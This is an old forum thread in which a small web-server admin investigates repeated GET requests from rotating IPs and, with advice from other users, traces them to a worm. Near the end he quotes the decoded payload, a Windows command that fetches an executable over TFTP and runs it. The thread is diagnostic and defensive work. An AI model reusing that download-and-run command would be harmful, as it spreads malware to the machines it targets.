|
Unusual requests
I am getting unusual series of requests on my server. It's a small web server that i use for my courses. Students come to get info/notes, and i only have 40 students this semester. The strange thing is that i keep getting GET requests on the home page (sometimes every 30 seconds) from adresses coming from a single ISP:
Code:
toronto-hse-ppp37nnnnn.sympatico.ca - - [13/Jun/2005:18:26:19 -0400] "GET / HTTP/1.0" 200 6119Sympatico.ca is a pppoe ISP. Getting that many of the same request from different persons is very unlikely for a small server such as mine. I think someone is sending a GET to the server, disconnecting his pppoe connection, re-connecting, sending another GET, and so on... (getting a different IP from the ISP everytime) Now that doesn't seems like much to worry about, as it's far from being enough to be a DOS attack, but i'm just curious to know from more experienced admins what kind of script the guy is running, and why? (Just an opinion from you guys would make me happy) :D Thanks! |
It is most likely a simple pre-made script taken from a hacking site. Why? Simple. It could be script-kiddies just messing around and having fun with their "ultra-cool hacking whacking" script. If this was a serious attacker, a DDoS would have occured and you would have been scanned several times with different scanners for open ports and/or exploits.
Now with the changing ip address. Canadians are known for their 56k connections (please don't bash me =P) so it doesn't matter. You won't be able to track him down (but you probably can if you have a serious attack; sue; company hands over info, etc.) So, he is basically attacking for a period, re-connecting, trying again. He may even have a dedicated server with auto-shutdown-restart scripts for his inet. But I'm paranoid, that's just me =P. --Abid Kazmi |
Quote:
No doubt there, a serious attacker would have taken the server down pretty fast.. It was port scanned a month ago but not much to worry about either. Quote:
Quote:
Thanks again! Vincent |
Well, never take computer security as an easy thing. There are literally millions of tool kits out their that can be used to compromise a system. So, maybe these kiddies might actually learn something and start using some more serious methods of hacking. So be careful and always check your firewall logs, etc.
--Abid Kazmi |
shrug, file a civil lawsuit in your local county court against "John Doe". they should give you a blank subpoena, if not ask for it. go make copies. get a pen. fill out a subpoena requesting the identiy of the user who was logged into the ISP's system using <IP> and <time>. Send to ISP (does not matter that its in CA). When the ISP gives you the kids docs, file a montion to dismiss with the county court. then call up his ISP and cancle his service with the info they just gave you.
yawn. oh and as an after thought: there is something useful on that server, UID0 - root - . you want to take part of the next massive DDoS attack? yeah, just because the data you have isn't important doesn't mean the server itself isn't as well. sites get taken down by DDoS not because a whole bunch of people had nifty cool files on their computers, but because since they didn't they couldn't be bothered to secure their systems, when infact their system was the target. |
Quote:
--Abid Kazmi |
Quote:
Quote:
What i meant is that if someone manages to hack the server, i'll just format&reinstall. And hopefully prevent him from getting in again ;) |
First save your files and the re-format and re-lease your ip =D.
--Abid Kazmi |
Actually, the server is on a dynamic IP (DynDns provides the domain name). So the IP changes every 3 days or so.
The problem is that it also means there's a script on the server that contains my username+password (unencrypted) for the ISP and DynDNS. That, i don't like :mad: but it seems there's no other way... (well no reasonable way...) |
Wow that sucks and a huge security problem.
--Abid Kazmi |
(Update)
I tried to connect on several ports of some of the computers. It looks like they have port 21 open, but without runnung any FTP server. The connection closes after some time. A quick google search says that it could be the "t0rn" rootkit. Now, i'm looking for a way to make sure..
That means that it is not only one computer connecting and disconnecting, but many computers connecting at a time interval. This is becoming fun ;) |
Quote:
Now what do you mean about the rootkit. You mean THEY have it or YOU have it. Explanation is a little weary. And btw, I'm not sure, but computer hacking is against LQ policy so don't discuss it any further. --Abid Kazmi |
No They have a rootkit installed on their computers. The person who installed the rootkit is using it to 'attack' my server. I tried to connect on the computers who 'attacked' my server to see what was there. On these computers, port 21 is open, but there's no ftp server running; you just get a blank screen (no echo neither). You can type in anything though.
I'm looking on the internet to see what kind of rootkit or worm (if any) is on their computers. I'll advise their ISP if i can confirm their computers have been hacked. |
You can try that but I hardly doubt the ISP will close their connection in one try. You're going to have to push them a little.
--Abid Kazmi |
Ok, the port 21 open was a mistake/bug/problem of my computer. My bad...
I started a sniffer on my webserver to get the full http request, and it turns out to contain a base64 encoded command: cmd /c tftp -i [host IP was here] GET win-logon.exe&start win-logon.exe&exit Another computer had more or less the same string but with a different file (explorer.exe instead of win-logon.exe). The computers have UDP port 69 open with a TFTP server running. So it's just a worm... I couldn't find an exact description, but this is close enough: http://www.trendmicro.com/vinfo/viru...M%5FRBOT%2EBJF (edit: BTW, an up to date version of Windows XP will not allow the worm in.) |
| All times are GMT -5. The time now is 11:26 PM. |